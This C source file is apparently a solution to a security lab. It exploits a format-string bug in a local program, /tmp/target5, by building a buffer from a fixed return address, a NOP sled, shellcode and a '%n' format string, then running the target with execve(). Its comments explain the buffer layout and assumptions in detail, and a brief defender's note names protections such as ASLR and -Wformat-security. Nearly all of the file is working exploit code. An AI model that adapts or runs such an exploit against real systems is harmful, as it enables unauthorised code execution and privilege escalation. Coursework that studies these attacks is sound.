/*
* sploit5.c
* Author - Saul Laufer
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include "shellcode.h"
#define TARGET "/tmp/target5"
#define NOP 0x90
#define RETADDR 0xbffffced
#define INJSTR "%u%u%012582523u%n"
/*
 * Entry point. Builds a single 400-byte argument for TARGET and replaces
 * this process with TARGET via execve(); on success it never returns.
 *
 * Layout of buf (indices are derived from the loop bounds below):
 *   [0 .. 3]                              the four bytes of RETADDR, low byte first
 *                                         (each shifted value is truncated to a char)
 *   [4 .. 399-strlen(INJSTR)-strlen(shellcode))  NOP (0x90) bytes
 *   next strlen(shellcode) bytes          shellcode (declared in shellcode.h, not shown here)
 *   next strlen(INJSTR) bytes             INJSTR, copied without its terminator
 *   [399]                                 '\0'
 *
 * Assumptions this layout depends on (not verifiable from this file):
 *   - a 32-bit target where 4 bytes of RETADDR overwrite a saved return
 *     address (the "%eip" wording below); RETADDR is a fixed constant, so
 *     it presumes a non-randomized stack.
 *   - strlen(INJSTR) + strlen(shellcode) <= 399: the bound arithmetic is
 *     done in size_t and would wrap otherwise.
 *
 * Returns 0 in every case, including when execve() fails (only a message is
 * printed), so the exit status does not signal failure to the caller.
 *
 * Defender's note: the bug class exercised here is untrusted data reaching a
 * printf-family format argument (INJSTR ends in "%n"); -Wformat-security /
 * -Wformat=2, FORTIFY_SOURCE, a non-executable stack and ASLR each break a
 * different assumption listed above.
 */
int main(void)
{
char *args[3];
char *env[1];
char buf[400];
int i;
//loop through buffer to fill correctly; every index 0..399 is written exactly once
for (i = 0; i < 400; i++) {
//first 4 bytes contain address 1 byte after %eip
//(RETADDR >> (i*8) truncated to char yields byte i, little-endian order)
if (i < 4) {
*(buf + i) = RETADDR >> (i * 8);
}
//NOPs slide: runs until the shellcode + INJSTR tail fits before index 399
else if (i < (399 - strlen(INJSTR) - strlen(shellcode))) {
*(buf + i) = NOP;
}
//shell code: index expression is 0 on the first iteration of this branch
else if (i < (399 - strlen(INJSTR))) {
*(buf + i) = shellcode[i - 399 + strlen(INJSTR) + strlen(shellcode)];
}
//last strlen(INJSTR) bytes are the format string using our width
//determined from decimal version of 4 bytes after buffer
//until suitable input found
else if (i < 399) {
//memcpy without the NUL; i is then advanced so the loop's i++ lands on index 399
memcpy(buf + i, INJSTR, strlen(INJSTR));
i += (strlen(INJSTR) - 1);
}
//null terminate end of buffer (index 399)
else {
*(buf + i) = 0;
}
}
//argv: program path, the constructed buffer, NULL; empty environment
args[0] = TARGET;
args[1] = buf;
args[2] = NULL;
env[0] = NULL;
//execve only returns on failure (it returns -1)
if (0 > execve(TARGET, args, env))
fprintf(stderr, "execve failed.\n");
return 0;
}